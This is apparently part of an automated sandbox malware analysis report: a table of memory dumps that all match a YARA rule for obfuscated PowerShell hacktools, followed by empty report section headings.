0000001B.00000000.16460822174.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000000.16461111447.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468544452.00110000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16470994291.0153D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16471109913.01660000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16471226487.016C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16469158345.004B1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468815770.003E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000002.16468838264.00406000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16461517453.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16465931308.0011C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468242022.004B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468174726.004A5000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468191650.004AC000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000000.16466455838.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468206147.00481000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480249069.00400000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480203790.003E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000002.16480269231.00426000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001C.00000003.16466700886.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472465532.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472603519.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472892522.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000000.16472742485.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000003.16468140620.004B2000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473840713.00340000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473711541.00270000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000002.16473904470.00366000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16475070317.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16475268349.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001D.00000003.16473177431.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16474820967.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000000.16474461723.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001E.00000003.16476187232.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16499978274.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500170033.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500483468.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567553929.00321000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567604876.004A0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567440908.002D0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567501646.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16501342355.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000002.16567480851.002FF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503064468.0030C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503079730.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000000.16500917401.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503118310.00306000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503179760.002D1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506373335.00327000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503265026.002F9000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506450727.0031C000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16506487131.0030F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16503292449.00300000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000021.00000003.16507436398.002FD000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16503997937.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16505979814.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16503831032.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000000.16505682606.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571554431.00098000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571520029.00070000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571590847.000AF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000002.16571752140.00440000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000023.00000003.16506433003.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16508717527.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16509432349.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16509719926.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000000.16510560264.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16572994813.00160000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573202405.004CF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573179221.004BF000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573258362.004E1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000025.00000002.16573119211.00490000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000024.00000000.16510314431.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth

Unpacked PEs

No yara matches

Screenshots

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots